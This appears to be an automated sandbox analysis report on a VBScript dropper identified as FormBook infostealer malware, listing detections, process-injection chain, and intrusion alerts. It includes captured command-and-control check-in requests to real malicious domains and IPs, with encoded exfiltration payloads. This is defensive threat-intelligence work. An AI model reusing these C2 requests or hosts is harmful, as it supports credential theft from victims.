Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO_1111101161.vbs

Overview

General Information

Sample name:PO_1111101161.vbs
Analysis ID:1566711
MD5:9311a38007910531ee085752d8f4bb94
SHA1:cd22e03275c2688f1600be4c520caaf87d76a4ec
SHA256:d4601158ebeec0fe8fd9799a60742222dc74d3eda2b7203f705d8195596bb12b
Tags:Formbookvbsuser-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Potential malicious VBS script found (has network functionality)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Use Short Name Path in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7424 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_1111101161.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • p_Cm7afCdw.exe (PID: 7632 cmdline: "C:\Users\user~1\AppData\Local\Temp\p_Cm7afCdw.exe" MD5: 5E4094C909CCCBA80D844F553391F9F2)
      • RegAsm.exe (PID: 7780 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
        • IGcdoWhymz.exe (PID: 5336 cmdline: "C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • SearchProtocolHost.exe (PID: 7812 cmdline: "C:\Windows\SysWOW64\SearchProtocolHost.exe" MD5: 727FE964E574EEAF8917308FFF0880DE)
            • IGcdoWhymz.exe (PID: 5312 cmdline: "C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
            • firefox.exe (PID: 8052 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.1809895611.00000000029D0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000006.00000002.2673360486.00000000030E0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000006.00000002.2671544693.0000000002C00000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000006.00000002.2673479877.0000000003130000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000004.00000002.1809321195.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 2 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            4.2.RegAsm.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              4.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: WScript or CScript Dropper
                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_1111101161.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_1111101161.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_1111101161.vbs", ProcessId: 7424, ProcessName: wscript.exe
                Sigma detected: Use Short Name Path in Command Line
                Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\Users\user~1\AppData\Local\Temp\p_Cm7afCdw.exe" , CommandLine: "C:\Users\user~1\AppData\Local\Temp\p_Cm7afCdw.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_1111101161.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7424, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\p_Cm7afCdw.exe" , ProcessId: 7632, ProcessName: p_Cm7afCdw.exe
                Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_1111101161.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_1111101161.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_1111101161.vbs", ProcessId: 7424, ProcessName: wscript.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-02T15:54:15.558508+010020507451Malware Command and Control Activity Detected192.168.2.749825156.251.17.22480TCP
                2024-12-02T15:54:40.854477+010020507451Malware Command and Control Activity Detected192.168.2.749883129.226.153.8580TCP
                2024-12-02T15:54:56.495424+010020507451Malware Command and Control Activity Detected192.168.2.74992247.254.140.25580TCP
                2024-12-02T15:55:12.428428+010020507451Malware Command and Control Activity Detected192.168.2.749957208.91.197.2780TCP
                2024-12-02T15:55:27.961594+010020507451Malware Command and Control Activity Detected192.168.2.749989104.21.24.19880TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-02T15:54:15.558508+010028554651A Network Trojan was detected192.168.2.749825156.251.17.22480TCP
                2024-12-02T15:54:40.854477+010028554651A Network Trojan was detected192.168.2.749883129.226.153.8580TCP
                2024-12-02T15:54:56.495424+010028554651A Network Trojan was detected192.168.2.74992247.254.140.25580TCP
                2024-12-02T15:55:12.428428+010028554651A Network Trojan was detected192.168.2.749957208.91.197.2780TCP
                2024-12-02T15:55:27.961594+010028554651A Network Trojan was detected192.168.2.749989104.21.24.19880TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-02T15:54:32.780909+010028554641A Network Trojan was detected192.168.2.749862129.226.153.8580TCP
                2024-12-02T15:54:35.448250+010028554641A Network Trojan was detected192.168.2.749868129.226.153.8580TCP
                2024-12-02T15:54:38.104466+010028554641A Network Trojan was detected192.168.2.749875129.226.153.8580TCP
                2024-12-02T15:54:48.458834+010028554641A Network Trojan was detected192.168.2.74990147.254.140.25580TCP
                2024-12-02T15:54:51.148441+010028554641A Network Trojan was detected192.168.2.74990747.254.140.25580TCP
                2024-12-02T15:54:53.921492+010028554641A Network Trojan was detected192.168.2.74991447.254.140.25580TCP
                2024-12-02T15:55:03.753321+010028554641A Network Trojan was detected192.168.2.749937208.91.197.2780TCP
                2024-12-02T15:55:06.426773+010028554641A Network Trojan was detected192.168.2.749945208.91.197.2780TCP
                2024-12-02T15:55:09.123055+010028554641A Network Trojan was detected192.168.2.749951208.91.197.2780TCP
                2024-12-02T15:55:19.954873+010028554641A Network Trojan was detected192.168.2.749977104.21.24.19880TCP
                2024-12-02T15:55:22.669325+010028554641A Network Trojan was detected192.168.2.749983104.21.24.19880TCP
                2024-12-02T15:55:25.315029+010028554641A Network Trojan was detected192.168.2.749988104.21.24.19880TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for dropped file
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exeAvira: detection malicious, Label: TR/Dropper.Gen
                Multi AV Scanner detection for submitted file
                Source: PO_1111101161.vbsReversingLabs: Detection: 18%
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.1809895611.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2673360486.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2671544693.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2673479877.0000000003130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1809321195.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1811075561.0000000002F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2673831486.00000000023A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for dropped file
                Source: C:\Users\user\AppData\Local\Temp\p_Cm7afCdw.exeJoe Sandbox ML: detected
                Source: Binary string: wntdll.pdb source: RegAsm.exe, SearchProtocolHost.exe
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02C1CB30 FindFirstFileW,FindNextFileW,FindClose,6_2_02C1CB30

                Software Vulnerabilities

                barindex
                Suspicious execution chain found
                Source: C:\Windows\System32\wscript.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 4x nop then xor eax, eax6_2_02C09EC0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 4x nop then mov ebx, 00000004h6_2_032304CE
                Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 4x nop then mov ebx, 00000004h11_2_0000021FB4D6A4CE

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49825 -> 156.251.17.224:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49825 -> 156.251.17.224:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49868 -> 129.226.153.85:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49862 -> 129.226.153.85:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49875 -> 129.226.153.85:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49883 -> 129.226.153.85:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49883 -> 129.226.153.85:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49901 -> 47.254.140.255:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49907 -> 47.254.140.255:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49914 -> 47.254.140.255:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49922 -> 47.254.140.255:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49922 -> 47.254.140.255:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49937 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49945 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49951 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49957 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49957 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49977 -> 104.21.24.198:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49983 -> 104.21.24.198:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49988 -> 104.21.24.198:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49989 -> 104.21.24.198:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49989 -> 104.21.24.198:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.duwixushx.xyz
                Potential malicious VBS script found (has network functionality)
                Source: Initial file: stream.SaveToFile filePath, 2
                Source: Joe Sandbox ViewIP Address: 208.91.197.27 208.91.197.27
                Source: Joe Sandbox ViewASN Name: POWERLINE-AS-APPOWERLINEDATACENTERHK POWERLINE-AS-APPOWERLINEDATACENTERHK
                Source: Joe Sandbox ViewASN Name: CONFLUENCE-NETWORK-INCVG CONFLUENCE-NETWORK-INCVG
                Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
                Source: Joe Sandbox ViewASN Name: TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /bmve/?l0W=Yh8P&cNeT5P=Rsosln+CouPFD70pouDpcL8MGxlXnptR0Qz9VzezY2yTYUIF1+nb00CRzlZGPtlDISGdoNhQK1cGxL7iAKAdX9QsE8jTEAf7iu+rTrEYDmOQoqL5x871qcXt+MmivaGg02pJqeyLSBOj HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.duwixushx.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /od8t/?cNeT5P=TWQhTiU1OhnYN4IGzL5Djgm2xLK+GsutbeycMWjZ529bH9hAjZgdb5GthJXWZD00/RQs8ByXB8t8HO5uPdBuAseiIzOw6dSVdaELJzAoH4UPHDMi9vPJYMLHkfbSf8iDlLYPpS7IMNNH&l0W=Yh8P HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.1qcczjvh2.autosConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /i7qk/?cNeT5P=y1Deuhcniwy3qxxQAmTyamEbBAp7BzgQf56uDV1XLiTDd60qTBhOzyQcu/peRmYp6AfM2zjHYnfo1VupJPImU0UbKzMKFpXAJ3iP9s5hV6VkbgV3kS/JEHHqfdUXmoMZ21WIq3bcKVXK&l0W=Yh8P HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.yvcp3.infoConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /rfhq/?cNeT5P=WCm/hpCimsJ9ehq7lKIv1VDyybMiIAv0Npn9YOFuJ9oZ3M+13oCVUFgjBEgQ3CHtpzgI5GBo5BBlGxqkDMLBAjerblAclHQGQEfPlkiGRydIYVrfr9hJQmq7K5VDFfSeZPk99y6g9Hkc&l0W=Yh8P HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.guacamask.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /jt56/?cNeT5P=3PCDLLbgpXdI7ZTJtsGfuMg/bmPFCu/6tWsXVWyqAde3py4xBHmx0QKjwMzGHP1esqkhpY0hgYiTwk+VbJ1wbQxw9SoOMJyFS7aCodBcGMHsrkiHFt0aNasFqY1YB+AO+7j098ky2tOd&l0W=Yh8P HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.supernutra01.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.duwixushx.xyz
                Source: global trafficDNS traffic detected: DNS query: www.1qcczjvh2.autos
                Source: global trafficDNS traffic detected: DNS query: www.yvcp3.info
                Source: global trafficDNS traffic detected: DNS query: www.guacamask.online
                Source: global trafficDNS traffic detected: DNS query: www.supernutra01.online
                Source: unknownHTTP traffic detected: POST /od8t/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brHost: www.1qcczjvh2.autosConnection: closeContent-Length: 219Content-Type: application/x-www-form-urlencodedCache-Control: no-cacheOrigin: http://www.1qcczjvh2.autosReferer: http://www.1qcczjvh2.autos/od8t/User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36Data Raw: 63 4e 65 54 35 50 3d 65 55 34 42 51 56 6f 47 51 43 6e 4c 4d 71 6b 30 7a 49 52 30 68 69 2f 4d 6f 62 50 38 44 66 36 71 47 38 7a 76 4d 79 48 66 37 48 70 68 45 63 41 64 74 34 63 34 41 5a 71 75 6d 74 6d 47 56 44 34 75 31 41 30 2f 73 6a 71 37 48 76 49 4b 64 50 6b 63 4f 65 64 39 63 2b 43 31 53 6c 44 43 37 74 65 54 64 72 63 7a 43 41 4d 6b 4c 35 77 69 46 57 41 57 2b 4d 7a 38 4d 4f 6e 73 71 39 66 49 5a 2b 69 50 31 59 4a 30 32 67 57 68 42 4f 4d 64 46 75 66 56 67 73 36 73 52 67 5a 46 78 31 62 4d 5a 6f 79 78 31 2f 72 59 72 77 4e 53 46 4e 59 65 53 55 32 42 4f 77 67 74 2b 6b 65 66 6c 62 56 51 38 35 50 39 34 59 50 31 32 33 57 39 72 6c 61 76 63 6c 4a 75 2b 41 3d 3d Data Ascii: cNeT5P=eU4BQVoGQCnLMqk0zIR0hi/MobP8Df6qG8zvMyHf7HphEcAdt4c4AZqumtmGVD4u1A0/sjq7HvIKdPkcOed9c+C1SlDC7teTdrczCAMkL5wiFWAW+Mz8MOnsq9fIZ+iP1YJ02gWhBOMdFufVgs6sRgZFx1bMZoyx1/rYrwNSFNYeSU2BOwgt+keflbVQ85P94YP123W9rlavclJu+A==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 02 Dec 2024 14:54:15 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Mon, 02 Dec 2024 14:54:32 GMTContent-Type: text/html; charset=utf-8Content-Length: 58288Connection: closeVary: Accept-EncodingETag: "67344967-e3b0"Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 09 09 09 09 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 09 09 09 09 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 32 25 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 09 09 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 2b 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 32 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 74 69 74 6c 65 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 